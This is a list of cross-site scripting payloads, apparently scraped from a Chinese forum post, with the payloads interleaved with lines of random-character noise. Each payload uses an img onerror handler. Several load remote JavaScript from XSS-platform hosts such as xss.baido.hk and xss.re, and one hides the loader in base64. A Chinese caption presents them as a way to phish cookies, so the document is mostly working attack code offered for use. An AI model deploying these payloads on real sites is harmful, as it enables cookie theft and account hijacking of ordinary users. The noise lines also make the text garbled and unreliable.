<img src='non-exist.jpg'onerror="alert('xss')">$ J A3 A2 [$ Q% T9 d& D
<img src=# onerror=alert(123)>
5 v5 k8 ]2 [( ]4 \+ |<img src=# onerror=alert(document.cookie)>/ l$ L/ |+ x+ g: C' Y
下面是利用平台钓cookie的
0 _& R. b; e! d$ v <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
" I' ` q$ V0 v
( J+ {/ f& e0 x) ~' O1 q* B# g
* [# ^: O7 ]& j+ ~$ K4 N2 T* _<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
& A2 e. h# {. s( T<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
: r$ W8 F$ V7 g( x: {% w/ Z“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
- k. {! I m( K) \<img src=1 onerror=jQuery.getScript("//xss.re/974")> 4 c3 D. y* E& z3 B3 q" f
<img src="#">
4 W2 Z" o' z0 B6 T5 n) I5 z1 V<img src="#">
7 S# r; ^ ]& ~: }<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>& X" l9 y* I) T4 f% i
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
1 z* a* H6 Z! I% e# _' Y3 B<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>4 d( d& a5 X+ X* R/ {* S1 I- r& v9 x
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
, y" ~ \: |3 e" n& H, E<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
6 H3 m& e, k% y$ ?0 N; k, L/ y$ W, ^8 v<img src=x width="0" height="0"></img>& k1 W8 q, [( Q% G" g! q. i
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
; ~5 s/ P+ u; A3 g- ~4 G, R2 {<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
: ?8 s a0 V9 [, q9 X7 a |